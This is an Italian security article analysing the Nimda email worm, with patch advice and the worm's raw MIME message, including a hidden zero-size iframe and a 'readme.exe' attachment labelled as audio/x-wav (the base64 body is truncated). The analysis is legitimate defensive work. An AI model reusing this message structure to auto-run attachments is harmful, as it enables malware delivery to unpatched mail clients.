Speciale W32.Nimda.A@mm, il worm che attacca Windows

di Daniele Bochicchio, in Security & Admin,

Questo articolo è uno speciale dedicato ad un nuovo virus/worm che colpisce i sistemi dotati di sistema operativo Windows, chiamato Nimda .

La particolarità di questo worm risiede nel fatto che viaggia come allegato ad un'e-mail, in grado di autoeseguirsi visualizzata da Outlook Express 5 o 5.01 senza SP2, infettando il sistema.

Ad una prima analisi del codice sorgente del messaggio, che è mostrato più in basso, si trova una certa analogia con altri worm già presenti. Tenta infatti di eseguire un file che infetterà poi il sistema, mascherando la richiesta come l'esecuzione di un file audio/wav.

Con questo escamotage , difatti, taglia via una fetta significativa di personal firewall, che di norma bloccano l'esecuzione di programmi allegati, non certo di file audio.

Analisi di un attacco

Per inciso, vi basta fare l'upgrade di IE alla versione 5.5 o meglio ancora alle 6 per stare sicuri, oppure applicare il SP ad IE 5.01 perchè siate praticamente al sicuro. Tuttavia, non è difficile che vi venga spontaneo premere su "Apri" (oppure che questa operazione venga fatta da qualcuno degli utenti della vostra LAN che mangari non ha molta dimestichezza con la sicurezza) e che quindi la frittata venga fatta.

 Received: from ...
From: <....>
Subject: desktopdeskto....
MIME-Version: 1.0
Content-Type: multipart/related;
  type="multipart/alternative";
  boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
Message-Id: ...
X-RCPT-TO: ...
Date: ...
X-UIDL: 285007901
Status: U

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
  boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
 <b><iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></b> </BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
 <b>Content-Type: audio/x-wav;
  name="readme.exe"</b> 
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAMpUCAEAAAB/UEUAAEwBBQB1Oqc7
[....]
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA=

--====_ABC1234567890DEF_====
2 pagine in totale: 1 2
Contenuti dell'articolo

Commenti

Visualizza/aggiungi commenti

| Condividi su: Twitter, Facebook, LinkedIn

Per inserire un commento, devi avere un account.

Fai il login e torna a questa pagina, oppure registrati alla nostra community.

Approfondimenti